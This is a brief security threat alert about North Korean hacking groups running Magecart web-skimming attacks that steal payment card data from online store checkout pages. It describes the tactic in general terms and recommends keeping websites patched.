Rewterz Threat Alert – Web Skimming (Magecart) attacks Targeted by North Korean Hackers

Severity

High

Analysis Summary

Infamous North Korean hackers have set their sights on online stores after hacking banks and cryptocurrency exchanges, orchestrating ATM cash-outs, and deploying ransomware. The state sponsored hacking crews are breaking into online stores to insert malicious code that can steal buyers’ payment card details as they visit the checkout page and fill in payment forms. The attacks have been observed from May 2019 after an extensive report was published by SanSec.

These types of attacks are named “web skimming,” “e-skimming,” or “Magecart attack,” with the last name coming from the name of the first group who engaged in such tactics.

The goal of these attacks is for hackers to gain access to a web store’s backend server, associated resources, or third-party widgets, where they can install and run malicious code on the store’s frontend. The code loads only on the check out page, and silently logs payment card details as they’re entered into checkout forms. This data is then exfiltrated to a remote server, from where hackers collect it and sell it on underground cybercrime markets.

Pyongyang have been linked to cyber heists activities for a long period of time where they’ve targeted at banks all over the globe, have been involved in ATM heists and ATM cash-outs in different regions, and it is no longer surprising that they’ve turned their eyes to online stores for their financial gains after more sanctions were imposed on them by the US government recently. These attacks have historically gravitated towards any type of cybercrime that can generate a profit for the pyongyang regime. 

Impact

• Gain access
• Financial loss
• Exposure of sensitive information

Remediation

Keep websites patched against exploitable vulnerabilities.